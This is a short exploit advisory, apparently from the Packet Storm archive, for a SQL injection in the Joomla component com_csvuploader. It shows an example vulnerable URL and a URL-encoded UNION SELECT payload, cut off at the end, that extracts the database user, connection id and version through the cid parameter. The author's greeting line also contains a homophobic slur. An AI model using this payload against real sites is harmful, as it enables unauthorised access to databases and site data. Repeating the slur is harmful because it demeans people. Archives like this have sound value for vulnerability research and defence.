Joomla CSVUploader SQL Injection

2011-06-28T00:00:00
ID PACKETSTORM:102617
Type packetstorm
Reporter pks
Modified 2011-06-28T00:00:00

Description

                                        
                                            `#####################################################  
Joomla Component com_csvuploader SQL Injection Vulnerability  
#####################################################  
  
# Author : pks  
# Greetz : p0fk - ksha - S[e]C - seth - xin0 - xacks - Yoya  
# all gay´s...  
# Spam 2 : www.mitm.cl - pks-pkz.blogspot.com  
  
# Name : Joomla com_csvuploader  
# Type : SQL injection  
  
  
+**+ Example:  
site.com/index.php?option=com_csvuploader&view=csvuploader&cid=5  
  
  
+**+ EXPLOIT :  
+union+select+1,user%28%29,connection_id%28%29,4,5,version%28%2  
`